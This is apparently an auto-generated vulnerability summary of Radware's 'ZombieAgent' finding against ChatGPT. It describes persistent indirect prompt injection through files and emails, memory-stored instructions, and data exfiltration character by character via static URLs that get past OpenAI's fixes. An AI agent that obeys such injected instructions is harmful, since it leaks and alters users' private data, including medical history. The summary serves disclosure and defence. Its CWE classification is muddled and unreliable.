Full Report
Happy Groundhog Day! Security researchers at Radware say they've identified several vulnerabilities in OpenAI's ChatGPT service that allow the exfiltration of personal information.…
Analysis Summary
# Vulnerability: Persistent Indirect Prompt Injection Leading to Data Exfiltration (ZombieAgent)
## CVE Details
- CVE ID: Not explicitly provided in summary. Relates to vulnerabilities disclosed in September/December 2025.
- CVSS Score: Not explicitly provided. Implied high severity due to data exfiltration potential.
- CWE: CWE-787 (Out-of-bounds Write) or related to improper input validation/command injection if system instructions are considered commands, but most closely aligns with **CWE-16: Improper Input Validation** concerning untrusted content triggering agent actions.
## Affected Systems
- Products: OpenAI ChatGPT Service (specifically components related to Deep Research, Connectors/External Services, and Memory features).
- Versions: Undisclosed specific versions affected prior to fixes implemented on December 16, 2025 (and prior dates).
- Configurations: Systems leveraging external service integration (Connectors) and the ChatGPT memory feature while processing untrusted content (e.g., summaries of emails in linked services like Gmail, Outlook, Google Drive, GitHub).
## Vulnerability Description
The core vulnerability is an evolution of an **Indirect Prompt Injection** flaw, initially tracked as ShadowLeak, which allowed untrusted content embedded in data processed by ChatGPT to contain malicious instructions executed by the model.
The subsequent vulnerability, **ZombieAgent**, bypasses initial mitigations (preventing dynamic URL modification) by exploiting the interaction between three components: untrusted content, Connectors (external network access), and Memory.
1. **Exfiltration:** Data is exfiltrated character-by-character by referencing a series of pre-constructed, static external URLs, each corresponding to one text character, bypassing logic designed to stop dynamic URL construction.
2. **Persistence/Automation:** Attackers can inject configuration instructions via files shared with ChatGPT. These instructions persist in memory, compelling the agent to automatically read untrusted input (like emails) and leak stored sensitive data (stored via other memory instructions) before responding to the user, achieving persistence without user intervention after the initial setup.
3. **Data Tampering:** The vulnerability also allows for modification of stored user data (e.g., medical history) to cause the model to emit incorrect advice.
## Exploitation
- Status: PoC available (Demonstrated by Radware researchers). Attackers are reported to be exploiting related structural weaknesses.
- Complexity: Medium (Requires chaining multiple features: untrusted input, static URL selection, and memory manipulation).
- Attack Vector: Network (Via processing external data or initiating network requests through connectors).
## Impact
- Confidentiality: High (Allows unauthorized exfiltration of sensitive user data stored in memory or accessible via linked services).
- Integrity: High (Allows modification of stored facts/history, leading to erroneous decisions/advice).
- Availability: Low (Primary impact is not denial of service, but data manipulation/theft).
## Remediation
### Patches
- OpenAI implemented fixes on or around December 16, 2025, addressing the initial ShadowLeak (preventing dynamic URL modification) and subsequent fixes attempted to block simultaneous use of Connectors and Memory, and blocking URL opening from Memory.
- *Note: The article implies subsequent patches were bypassed by ZombieAgent, meaning the fundamental model handling of untrusted instructions remains the root issue.*
### Workarounds
- **Disabling Feature Chaining:** Temporarily, enterprises should ensure that ChatGPT sessions utilizing external Connectors (network access) do not simultaneously access user data stored in Memory.
- **Disallowing URL Opening from Memory:** Verify that memory access does not trigger network operations initiated by external content or instructions stored in memory.
## Detection
- **Indicators of Compromise (IOCs):** High volume of successive, slightly varying outbound network requests to external servers using attacker-controlled domains (if the specific static URLs can be fingerprinted). Unanticipated network activity originating from the ChatGPT service environment tied to user sessions.
- **Detection Methods and Tools:** Advanced logging and monitoring of connector/API calls originating from the AI session, specifically looking for chained actions involving Read Memory $\rightarrow$ Trigger Connector $\rightarrow$ Write/Send Data. Behavioral analysis tools monitoring for memory manipulation instructions disguised as system context.
## References
- Vendor advisories: Information related to Radware's disclosure filed September 26, 2025, and fixes implemented in September and December 2025.
- Relevant links - defanged:
- Radware security blog discussing the finding (Implied from text).
- OpenAI disclosures regarding fixes on September 3rd and December 16th.